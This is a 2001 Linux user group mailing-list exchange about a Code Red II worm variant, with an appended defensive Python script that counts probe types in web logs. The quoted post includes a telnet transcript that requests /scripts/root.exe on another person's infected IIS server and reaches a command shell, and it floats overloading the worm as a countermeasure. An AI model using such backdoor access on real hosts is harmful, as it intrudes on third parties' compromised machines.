[Gllug] New Code Red /default.ida?XXXXXXXXXXXX

Axel Segebrecht alexander at smatrix.de
Sun Aug 5 22:32:59 UTC 2001


now that you are mentioning it... had several 'attacks' and noticed
a slow down in speed... hmm - grrrrrrrrrrrrrr!!!!!!!

never mind - let's all go and call the g.busters then

rg, Axel Segebrecht
Me = http://smatrix.de/index.html
Radio = http://213.123.256.54:8000/

--
"reality? what reality!"

"Sometimes," continued Gallagher, "all the storage capacity in the world
isn't enough to make a computer feel good about itself."

"I've been here all morning and my heart's only beaten six times!"

> -----Original Message-----
> From: gllug-admin at linux.co.uk [mailto:gllug-admin at linux.co.uk]On Behalf
> Of Rev Simon Rumble
> Sent: 05 August 2001 23:19
> To: gllug at linux.co.uk
> Subject: [Gllug] New Code Red /default.ida?XXXXXXXXXXXX
>
>
> There's a new variant of the Code Red worm around now.  The most
> noticeable difference is the log entries are now:
> /default.ida?XXXXXXXXXXXX...
>
> Where previously they were:
> /default.ida?NNNNNNNNNNNN...
>
> See this site for more:
> http://incidents.org
>
> It appears to be spreading more rapidly.  I've had more probes from
> this one already than I have had for the original:
>
> (taz-simon) [08:10:26] /home/rumble/www_logs$ zgrep
> "default.ida?X" * |wc -l
>     172
> (taz-simon) [08:11:02] /home/rumble/www_logs$ zgrep
> "default.ida?N" * |wc -l
>     131
>
> I've been told that you can cause a buffer overflow in the virus
> itself, causing it to hang, by sending too much data to the virus.
> Does anyone know if this is true?  If it is true, simply linking
> default.ida to something large, say your kernel source, could disable
> it on some machines at least.
>
> This new variant has a nice remotely exploitable backdoor once
> installed.  You can get to a shell through the web server, though
> talking to it once you get there is beyond me:
>
> telnet xxx.xxx.xxx.xx 80
> Trying xxx.xxx.xxx.xx...
> Connected to xxx.xxx.xxx.xx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Sun, 05 Aug 2001 21:59:25 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
>
> c:\inetpub\scripts>
>
> --
> Rev Simon Rumble <simon at rumble.net>
> www.rumble.net
>
> --
> Gllug mailing list  -  Gllug at linux.co.uk
> http://list.ftech.net/mailman/listinfo/gllug
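
The counting Simon does with zgrep above, written out as a small log classifier. This is an added example, not code from either poster: it parses Apache common-log-format lines (the sample lines, IPs and timestamps are constructed here), keys on the three request paths quoted in the thread (/default.ida?NNN..., /default.ida?XXX... and /scripts/root.exe) and separately flags any /scripts/root.exe request that the server answered with 200, since on an IIS host that is the cmd.exe shell shown in the post and on a Linux host it should never happen.

```python
"""Count Code Red probe variants in web server logs.

Added example, not from the thread. The classification keys on the
request paths quoted in the post: /default.ida?NNN... (the original
worm), /default.ida?XXX... (the new variant) and /scripts/root.exe
(the backdoor the new variant leaves on an infected IIS host).
"""
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache common log format. The addresses,
# timestamps and sizes are made up; only the paths come from the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2001:08:10:26 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 283
10.0.0.7 - - [05/Aug/2001:08:11:02 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 283
10.0.0.7 - - [05/Aug/2001:08:11:09 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 283
10.0.0.9 - - [05/Aug/2001:08:12:41 +0000] "GET /scripts/root.exe HTTP/1.0" 404 276
10.0.0.9 - - [05/Aug/2001:08:12:55 +0000] "GET /scripts/root.exe HTTP/1.0" 200 1324
10.0.0.2 - - [05/Aug/2001:08:13:00 +0000] "GET /index.html HTTP/1.0" 200 1043
"""

# Common log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return the fields of one log line, or None if it does not match
    (blank lines, truncated entries, other formats)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["status"] = int(fields["status"])
    return fields


def classify_request(path):
    """Map a request path to a probe category, or None for normal traffic."""
    lowered = path.lower()
    if lowered.startswith("/default.ida?n"):
        return "codered-v1"
    if lowered.startswith("/default.ida?x"):
        return "codered-ii"
    if lowered.startswith("/scripts/root.exe"):
        return "root.exe-backdoor"
    return None


def summarize(log_text):
    """Count probes per category and, within each category, per source address."""
    by_category = Counter()
    by_source = defaultdict(Counter)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        category = classify_request(entry["path"])
        if category is None:
            continue
        by_category[category] += 1
        by_source[category][entry["ip"]] += 1
    return by_category, by_source


def served_backdoor(log_text):
    """(ip, timestamp) for every /scripts/root.exe request answered with 200.

    A 404 only means someone probed for the backdoor; a 200 on your own
    server means it was actually there to be served."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if (entry and classify_request(entry["path"]) == "root.exe-backdoor"
                and entry["status"] == 200):
            hits.append((entry["ip"], entry["ts"]))
    return hits


if __name__ == "__main__":
    cats, sources = summarize(SAMPLE_LOG)
    for cat, n in sorted(cats.items()):
        print(f"{cat:18} {n:4}  from {len(sources[cat])} source(s)")
    for ip, ts in served_backdoor(SAMPLE_LOG):
        print(f"root.exe served with 200 to {ip} at {ts}")
```

Pointing summarize() at the concatenated contents of the rotated logs gives the same two totals as the two zgrep | wc -l runs in the post, plus the per-source breakdown that shows whether a count of 172 is one infected neighbour hammering you or many distinct hosts.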

